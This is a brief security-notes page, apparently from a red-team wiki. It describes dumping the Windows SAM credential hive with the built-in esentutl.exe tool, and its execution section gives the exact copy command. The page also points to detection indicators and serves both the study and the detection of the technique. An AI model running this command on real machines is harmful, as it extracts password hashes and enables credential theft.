# Dumping SAM via esentutl.exe

### Execution

It's possible to use esentutl.exe that comes with Windows and dump SAM/Security hives like so:

```
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam
```

![](https://content.gitbook.com/content/pkdwDJIuvdv3ukF6DFYY/blobs/zUOipm8UCAPbeehiAjg1/image)

### Observation

The below are some potential IOCs for detecting this technique:

![](https://content.gitbook.com/content/pkdwDJIuvdv3ukF6DFYY/blobs/3Ngfn9qpZKDyUZduvlkr/image)

### References

{% embed url="<https://superuser.com/questions/364290/how-to-dump-the-windows-sam-file-while-the-system-is-running>" %}